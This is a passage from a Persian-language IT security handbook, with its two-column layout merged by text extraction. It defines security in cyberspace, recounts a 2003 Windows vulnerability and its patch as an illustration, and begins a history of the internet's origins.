‫ﺣﻤﻠﻪ ﺑﻪ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﻧﺒﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﻣﻲﭘﺬﻳﺮﻳﻢ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻭ ﺭﻭﺷـﻬﺎﻱ ﺣﻔـﺎﻇﺘﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺑـﻪ‬
‫ﺩﺭ ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ‬
‫ﺷﻜﻠﻲ ﺩﻳﮕﺮ ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺎ ﺑﻪ ﺁﻥ ﺍﻧـﺪﺍﺯﻩ ﻛـﻪ ﺑـﺎ ﺗـﺪﺍﺑﻴﺮ‬
‫ﻼ ﻫﻤﻴـﺸﻪ ﻣـﺎﻳﻠﻴﻢ ﻋﻤـﺮﻱ ﻃـﻮﻻﻧﻲ ﻭ‬ ‫ﺩﺍﺭﻳﻢ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪ .‬ﻣﺜ ﹰ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ ﺑﺎ ﻣﺎﻫﻴﺖ ﺁﻧﻬـﺎ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﺟﺴﻤﻲ ﺳﺎﻟﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ؛ ﻭﻟﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﻣﻌـﺪﻝ ﺁﻣـﺎﺭﻱ‬
‫ﺁﺷﻨﺎ ﻧﻴﺴﺘﻴﻢ‪ ،‬ﺍﻣﺎ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﻢ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫ﻃﻮﻝ ﻋﻤﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﺮﺍﻱ‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ‪ ،‬ﺭﻭﺵ ﻛـﺎﺭﺑﺮﺩ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺻﺪﻕ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﻣـﺎ ﺩﺭ ﺳـﻨﻴﻦ ﭘـﺎﺋﻴﻦ‬
‫ﺑﺪﺍﻧﻴﻢ‪ .‬ﻫﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻭ ﻫﻢ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨـﺪ‬
‫ﻣﻲﻣﻴﺮﻳﻢ‪ ،‬ﺗﻌﺪﺍﺩﻱ ﺩﺭ ﻃﻮﻝ ﺣﻴﺎﺕ ﺑﺎ ﺑﻴﻤﺎﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺳـﺖ‬
‫ﺣﻔﺎﻇﺖ ﻭ ﺩﻓﺎﻉ ﺍﺯ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺩﻳﮕﺮﺍﻥ ﻭ‬
‫ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻴﻢ‪ ،‬ﻭ ﺑﺮﺧﻲ ﺗﺎ ﺳﺎﻟﻴﺎﻥ ﺩﺭﺍﺯ ﺯﻧﺪﻩ ﻣﻲﻣـﺎﻧﻴﻢ ﻭ‬
‫ﺩﺭﺻــﻮﺭﺕ ﻣﻮﻓﻘﻴــﺖﺁﻣﻴــﺰ ﺑــﻮﺩﻥ ﺣﻤــﻼﺕ‪ ،‬ﺑــﺎﺯﭘﺲﮔﻴــﺮﻱ‬
‫ﻋﻤﺮﻱ ﺑﻪ ﺳﻼﻣﺖ ﺭﻭﺯﮔﺎﺭ ﻣﻲﮔﺬﺭﺍﻧﻴﻢ‪ .‬ﻋـﺪﻡ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺩﺭ‬
‫ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﻣﻲﺑﺎﺷﻴﻢ‪.‬‬
‫‪٣٣‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﺑﺮﻃﺮﻑ ﺳﺎﺧﺘﻦ ﺍﻳﻦ ﺍﺷـﻜﺎﻝ ﺭﻭﻱ ﭘﺎﻳــﮕﺎﻩ ﻭﺏ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ‬ ‫ﺗﻌﺎﺭﻳﻒ ﻭ ﺗﻮﺿﻴﺤﺎﺗﻲ ﻛﻪ ﺩﺭ ﻓﺮﻫﻨﮕﻬـﺎﻱ ﻟﻐـﺎﺕ ﻭ ﻭﺍﮊﻩﻧﺎﻣـﻪﻫـﺎ‬
‫ﻗﺮﺍﺭﺩﻫﺪ ‪"....‬‬ ‫ﺑﺮﺍﻱ ﻭﺍﮊﺓ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﻪ ﻣـﻮﺍﺭﺩﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺎ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

‫ﺳﻼﻣﺘﻲ ﻣﺮﺗﺒﻂ ﻫﺴﺘﻨﺪ‪ ،‬ﻧﻈﻴﺮ "ﻛﻴﻔﻴﺖ ﻳـﺎ ﺣـﺎﻟﺘﻲ ﺍﺯ ﺍﻃﻤﻴﻨـﺎﻥ‪،‬‬


‫ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﻛﻪ ﺗﻮﺳﻂ ﭘﮋﻭﻫﺸﮕﺮﺍﻧﻲ ﺍﺯ ﻛـﺸﻮﺭ ﻟﻬـﺴﺘﺎﻥ ﻛـﺸﻒ‬
‫ﺁﺯﺍﺩﻱ ﺍﺯ ﺧﻄﺮ ﻭ ﺭﻫـﺎﻳﻲ ﺍﺯ ﺗـﺮﺱ ﻳـﺎ ﺍﺿـﻄﺮﺍﺏ"‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ‬
‫ﺷﺪ ﻧﺴﺨﻪﻫﺎﻱ ﺭﺍﻳﺞ ‪ Windows‬ﺩﺭ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧـﺎﻧﮕﻲ ﺭﺍ‬
‫ﻫﻴﭽﻴﻚ ﺍﺯ ﺍﻳﻦ ﺗﻌﺎﺭﻳﻒ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﻮﺻﻴﻒ ﺩﻗﻴﻖ ﺍﻣﻨﻴـﺖ‬
‫ﻧﻴــﺰ ﺗﺤــﺖ ﺗــﺄﺛﻴﺮ ﻗــﺮﺍﺭ ﺩﺍﺩ‪" :‬ﺍﻳــﻦ ﻣــﻮﺭﺩ ﻳﻜــﻲ ﺍﺯ ﺑــﺪﺗﺮﻳﻦ‬
‫ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ Windows‬ﺍﺳﺖ ﻛﻪ ﺗﺎ ﻛﻨﻮﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ"‪،‬‬
‫ﺍﻳﻦ ﮔﻔﺘـﺔ ﻣـﺎﺭﻙ ﻣـﺎﻳﻔﺮﺕ‪ ٢٩‬ﻣـﺪﻳﺮ ﺍﺟﺮﺍﻳـﻲ ﻣﺆﺳـﺴﺔ ﺍﻣﻨﻴـﺖ‬ ‫ﺩﺭ ﻋﻮﺽ ﻣﺎ ﺗﻌﺮﻳﻒ ﺯﻳـﺮ ﺭﺍ ﭘﻴـﺸﻨﻬﺎﺩ ﻣـﻲﻛﻨـﻴﻢ‪ :‬ﻫﻨﮕـﺎﻣﻲ ﺩﺭ‬
‫ﺩﻳﺠﻴﺘﺎﻝ ﭼﺸﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ٣٠‬ﻭﺍﻗﻊ ﺩﺭ ﺁﻟﻴﺴﻮ ﻭﻳﻪ ﺟﻮ‪ ٣١‬ﺩﺭ ﺍﻳﺎﻟﺖ‬ ‫ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﻳﻤﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﻛﺎﻟﻴﻔﺮﻧﻴﺎﺳــﺖ ﻛــﻪ ﻣﺤﻘﻘــﺎﻥ ﺁﻥ ﻧﻈﻴــﺮ ﻫﻤــﻴﻦ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ‬ ‫ﺷﻤﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺧﻮﺩﺗﺎﻥ ﺑﺎﺷﺪ‪ ،‬ﻳﻌﻨﻲ ﻫﻴﭻ ﻛﺲ ﺑﺪﻭﻥ ﻛـﺴﺐ‬
‫ﺧﻄﺮﻧﺎﻙ ﺭﺍ ﺩﺭ ﺳﻪ ﻧﺴﺨﺔ ﻗﺒﻠﻲ ‪ Windows‬ﻛﺸﻒ ﻛـﺮﺩﻩﺍﻧـﺪ‪.‬‬ ‫ﺍﺟﺎﺯﻩ ﺍﺯ ﺟﺎﻧﺐ ﺷﻤﺎ ﻗﺎﺩﺭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻦ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﻣﺎﻳﻔﺮﺕ ﺩﺭﺑﺎﺭﺓ ﺷﺮﻛﺘﻬﺎﻱ ﺁﺳﻴﺐﺩﻳﺪﻩ ﻋﻨﻮﺍﻥ ﻛﺮﺩ‪" :‬ﺗـﺎ ﺯﻣﺎﻧﻴﻜـﻪ‬ ‫ﻧﺒﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫـﺎ ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ،‬ﺷـﺒﻜﻪﺍﻱ‪،‬‬
‫ﺁﻧﻬﺎ ﺍﻳﻦ ﻭﺻﻠﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺭﺍ ﻧﺼﺐ ﻧﻜﻨﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﻣﺜـﻞ‬ ‫ﺗﺮﺍﻛﻨﺸﻲ‪ ،‬ﭘﺮﺩﺍﺯﺷﻲ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﻣﻤﻜﻦ ﺍﺳﺖ‬
‫ﻳﻚ ﺗﻜﻪ ﭘﻨﻴﺮ ﺳﻮﺋﻴﺴﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻭ ﻫﺮﻛﺲ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺮﺍﺣﺘـﻲ‬ ‫ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺍﺯ ﺟﺎﻧﺐ ﺩﻳﮕﺮﺍﻥ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﺍﺭﺍﺋـﻪ‬
‫ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺷﻮﺩ‪".‬‬ ‫ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﻣﺜﻞ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ‪ ٢٥‬ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺍﺷـﺘﺮﺍﻛﻲ ﻳـﺎ‬
‫ﺍﻣﺎ ﻫﻤـﺎﻥ ﺯﻣـﺎﻥ ﭼﻬـﺎﺭ ﭘﮋﻭﻫـﺸﮕﺮ ﻟﻬـﺴﺘﺎﻧﻲ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﻼ ﺍﻳﻤـﻦ ﻧﻴـﺴﺘﻨﺪ‪،‬‬ ‫)‪ .٢٦(ISP‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻫﻴﭽﮕﺎﻩ ﻛـﺎﻣ ﹰ‬
‫"‪"Last Stage of Delirium Research Group‬‬
‫ﺗﻨﻬﺎ ﺗﺎ ﻭﻗﺘﻴﻜﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺷﻨﺎﺧﺘﻪ ﻣـﻲﺷـﺪﻧﺪ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺭﺍﻫـﻲ ﺑـﺮﺍﻱ ﻋﺒـﻮﺭ ﺍﺯ‬
‫ﺻﺤﻴﺢ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﺮ ﺩﺳﺘﺮﺳـﻲ ﻣـﺪﺍﻭﻡ ﻭ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﻲﺩﺍﻧﻨﺪ ﻭ ﺍﻳﻦ ﺯﻣـﺎﻧﻲ ﺑـﻮﺩ ﻛـﻪ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳﺐ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﺷﺮﺍﻑ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺗﻨﻬﺎ ﺳﻪ ﻣـﺎﻩ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻭﺻـﻠﻪﻫـﺎ ﻣـﻲﮔﺬﺷـﺖ‪ .‬ﻫﺮﭼﻨـﺪ‬
‫ﭘﮋﻭﻫـــﺸﮕﺮﺍﻥ ﻟﻬـــﺴﺘﺎﻧﻲ ﺍﺑـــﺰﺍﺭﻱ ﺑـــﺮﺍﻱ ﺍﺛﺒـــﺎﺕ ﻭﺟـــﻮﺩ‬ ‫ﻣﺜﺎﻟﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﺎﻫﻴﺖ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﺭﺍﺋـﻪ ﻣـﻲﺷـﻮﺩ‪.‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻱﺗﺮ ﻃﺮﺍﺣﻲ ﻛﺮﺩﻩ ﻭ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑـﻪ‬ ‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﻘﺼﻲ ﻛﻪ )ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ(‬
‫ﭼﻨﺪ ﺭﺍﻳﺎﻧﻪ ﻧﻔﻮﺫ ﻛﺮﺩﻧﺪ‪ ،‬ﻭﻟﻲ ﻣﺘﻌﻬﺪ ﺷﺪﻧﺪ ﻛﻪ ﻫﻴﭻ ﺍﺛﺮﻱ ﺍﺯ ﺍﻳـﻦ‬ ‫ﺩﺭ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Microsoft Windows‬ﻳﺎﻓﺘﻪ ﺷـﺪﻩ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑﺠـﺎﻱ ﻧﮕﺬﺍﺭﻧـﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ‬ ‫ﻣﻲﭘﺮﺩﺍﺯﻳﻢ‪:‬‬
‫ﻣﺘﺨﺼﺼﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻃﻲ ﭼﻨﺪ ﻣﺎﻩ ﺁﻳﻨـﺪﻩ ﺍﺯ‬ ‫"ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﻧــﺴﺨﻪﻫــﺎﻱ ﻣﻮﺟــﻮﺩ ﺍﺯ‬
‫ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺣﺘـﻲ‬ ‫ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ‪ Windows‬ﺧﻮﺩ ﻳﻚ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ‪ ٢٧‬ﺑـﺴﻴﺎﺭ‬
‫ﺑﺪﻭﻥ ﺍﻋﻼﻡ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﺳـﻮﻱ ﺁﻥ ﭘﮋﻭﻫـﺸﮕﺮﺍﻥ‪ ،‬ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫‪٣٢‬‬
‫ﻣﻬﻢ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻛﻪ ﺍﻭﻟﻴﻦ ﺗﺄﺛﻴﺮ ﺁﻥ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﻛـﺎﺭ ﺍﻓﺘـﺎﺩﻥ‬
‫ﻧﻮﻋﹰﺎ ﻗﺎﺩﺭ ﺑﻪ ﻋﺒﻮﺭ ﺍﺯ ﻭﺻﻠﻪﻫﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻫﺴﺘﻨﺪ"‪.‬‬ ‫ﻛﺎﻣــﻞ ‪ Microsoft Windows Server 2003‬ﺑﺎﺷــﺪ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭﻭﻥ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ‪ ،‬ﻣـﺎ ﻫـﻴﭻ‬ ‫ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﮔﻔﺘﻪ ﻛﻪ ﺍﻳﻦ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻧﻔﻮﺫﮔﺮﻫـﺎ ﺭﺍ‬
‫ﻛﻨﺘﺮﻟﻲ ﺭﻭﻱ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻧﻈﻴـﺮ ‪ Windows‬ﻧـﺪﺍﺭﻳﻢ‪.‬‬ ‫ﻗــﺎﺩﺭ ﻛﻨــﺪ ﻛــﻪ ﺍﺯ ﻃﺮﻳــﻖ ﺍﻳﻨﺘﺮﻧــﺖ ﻛﻨﺘــﺮﻝ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ‬
‫ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺴﻴﺎﺭ ﻣﻬـﻢ ﺍﺳـﺖ ﻛـﻪ‬ ‫‪ Windows‬ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻗﺮﺑﺎﻧﻴــﺎﻥ ﺧــﻮﺩ ﺭﺍ ﺑﺪﺳــﺖ ﮔﺮﻓﺘــﻪ‪،‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺸﺎﻥ ﺍﻳﻤﻦ ﻭ ﻋﺎﺭﻱ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺧﻄﺎ ﺑﺎﺷﺪ‪ ،‬ﺍﻣـﺎ ﺯﻣـﺎﻧﻲ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺪﺯﺩﻧﺪ‪ ،‬ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻨـﺪ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﻛﻪ ﭼﻨﻴﻦ ﻣﺸﻜﻼﺗﻲ ﺑﺮﻭﺯ ﻣﻲﻛﻨﻨﺪ ﺑﺎ ﺍﺗﺨﺎﺫ ﺗﺪﺍﺑﻴﺮ ﻭ ﺗـﺼﻤﻴﻤﺎﺕ‬ ‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﺷﺮﻛﺖ ﺑﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ‬
‫ﻣﻨﺎﺳﺐ ﻣﻲ ﺗﻮﺍﻧﻴﻢ ﻧﺴﺒﺖ ﺑﻪ ﺗﻬﻴﻪ ﻭ ﻧﺼﺐ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻼﺣﻲ‬ ‫ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺍﺩ ﻛـﻪ ﺑﻼﻓﺎﺻــﻠﻪ ﻳـﻚ ﻭﺻــﻠﻪ‪ ٢٨‬ﺭﺍﻳﮕـﺎﻥ ﺑـﺮﺍﻱ‬

‫‪29‬‬ ‫‪Marc Maiffret‬‬ ‫‪25‬‬ ‫‪User Account‬‬


‫‪30‬‬ ‫‪eEye Digital Security Inc‬‬ ‫‪26‬‬ ‫‪Internet Service Provider‬‬
‫‪31‬‬ ‫‪Aliso Viejo‬‬ ‫‪27‬‬ ‫‪Vulnerability‬‬
‫‪32‬‬ ‫‪Ted Bridis, Associated Press July 16.2003.‬‬ ‫‪28‬‬ ‫‪Patch‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٤‬‬

‫ﻛﺮﺩ‪ .‬ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻣﻘﻴﺎﺳﻬﺎﻱ‬ ‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻗﺪﺍﻡ ﻛﻨﻴﻢ ﻭ ﺍﻳﻦ ﺗﻨﻬﺎ ﺭﻭﺵ ﻣﻘﺎﺑﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﻢ‪.‬‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﭼﻄـﻮﺭ ﺑﺎﻳـﺪ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﺧــﻮﺩ ﺣﻔﺎﻇــﺖ ﻧﻤــﺎﻳﻴﻢ ﻭ ﻫﻤﭽﻨــﻴﻦ ﻣــﻲﺩﺍﻧــﻴﻢ ﻛــﻪ ﺑﻌــﻀﻲ ﺍﺯ‬
‫ﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣـﺮﻭﺯ ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑـﺎ ﻫـﺪﻑ‬
‫ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍ ﹺ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛـﺮﺩ ﻭ ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﭘﮋﻭﻫﺶ ﻭ ﺁﻣﻮﺯﺵ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﺑـﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜـﻪ ‪ARPANET‬‬ ‫ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩﺍﻧﻪ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ‪ .‬ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ‬
‫)ﺍﻳﻨﺘﺮﻧﺖ ﺍﻭﻟﻴﻪ( ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺍﻳﺠﺎﺩ ﺷﺪ‪ ،‬ﻫﺪﻑ ﺍﺻﻠﻲ ﺁﻥ ﺍﺷﺘﺮﺍﻙ‬ ‫ﺩﺭﻫﺎﻱ ﺩﻓﺎﺗﺮ ﻭ ﻛﻤﺪﻫﺎﻱ ﺣﺎﻭﻱ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻗﻔﻞ ﻣﻲﻛﻨﻴﻢ ﻭ ﺣﺘـﻲ‬
‫ﻣﻨﺎﺑﻊ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺘﻌﺪﺩ ﭘﮋﻭﻫﺸﮕﺮﺍﻥ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻬـﻢ ﺭﺍ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻞ‬
